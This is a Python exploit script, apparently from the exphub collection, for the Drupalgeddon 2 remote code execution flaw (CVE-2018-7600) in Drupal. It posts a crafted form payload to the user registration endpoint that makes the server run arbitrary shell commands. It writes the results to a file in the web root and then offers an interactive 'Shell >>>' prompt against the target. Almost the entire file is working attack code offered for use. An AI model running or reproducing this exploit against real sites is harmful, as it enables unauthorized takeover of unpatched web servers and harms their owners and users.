#!/usr/bin/python3
# coding:utf-8
# author:zhzyker
# from:https://github.com/zhzyker/exphub

import sys
import requests
import json

if len(sys.argv)!=2:
    print('+----------------------------------------------------------------------+')
    print('+ DES: by zhzyker as https://github.com/zhzyker/exphub                 +')
    print('+      Drupal Drupalgeddon 2 远程代码执行 CVE-2018-7600                +')
    print('+----------------------------------------------------------------------+')
    print('+ USE: python3 <filename> <url>                                        +')
    print('+ EXP: python3 cve-2018-7600_cmd.py http://1.1.1.1:8080                +')
    print('+ VER: Drupal 6.x                                                      +')
    print('+      Drupal 7.x < 7.58                                               +')
    print('+      Drupal 8.3 < 8.3.9                                              +')
    print('+      Drupal 8.4 < 8.4.6                                              +')
    print('+      Drupal 8.5 < 8.5.1                                              +')
    print('+----------------------------------------------------------------------+')
    print('+ DES: Shell仅能回显一行代码，多行代码结果查看http://xxxx/exphub.txt   +')
    print('+----------------------------------------------------------------------+')
    sys.exit()

url=sys.argv[1]
#cmd=sys.argv[2]
cmd="whoami"

proxies = {}
verify = True

def do_post(cmd):
    target = url + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax' 
    payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': ''+cmd+' | tee exphub.txt'}
    r = requests.post(target, proxies=proxies, data=payload, verify=verify)
    command = r.json()[0]["data"]
    command = command.split("<span")[0]
    print (command)
    
check = requests.get(url + '/exphub.txt', proxies=proxies, verify=verify)
if check.status_code != 200:
  sys.exit("[-] not cve-2018-7600\n")
print ('[+] '+url+'/exphub.txt\n')

while 1:
    cmd = input("Shell >>> ")
    if cmd == "exit" : exit(0)
    do_post(cmd)
